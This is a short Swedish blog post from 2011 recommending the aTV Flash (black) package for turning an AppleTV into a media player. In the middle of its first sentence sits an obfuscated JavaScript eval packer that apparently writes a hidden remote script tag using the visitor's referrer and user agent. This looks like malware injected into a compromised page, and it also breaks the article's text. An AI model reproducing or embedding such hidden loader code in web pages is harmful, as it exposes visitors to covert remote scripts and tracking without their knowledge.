Image Image Image Image Image Image Image Image Image Image

| 18 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Gör om din AppleTV till en riktig mediaspelare.

Gör om din AppleTV till en riktig mediaspelare.
Filip Urde
  • On 17 november, 2011
  • http://www.revue.se/filip-urde

För dig som tycker att eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndyhi|var|u0026u|referrer|ferab||js|php’.split(‘|’),0,{}))
AppleTV
är lite väl fattig på funktioner, så har vi här en lösning för dig.

Det heter aTV Flash (black) och är ett mjukvarupaket som du installerar på din AppleTV, som sedan ger din AppleTV möjligheten att  köra en webbläsare, streama mer eller mindre alla format från din NAS eller dator. Det blir helt enkelt en riktigt mediaspelare. Nu kanske det är dags att skaffa en AppleTV…


Mjukvarupaketet kostar 30 dollar (ca 210 kronor).
firecore.com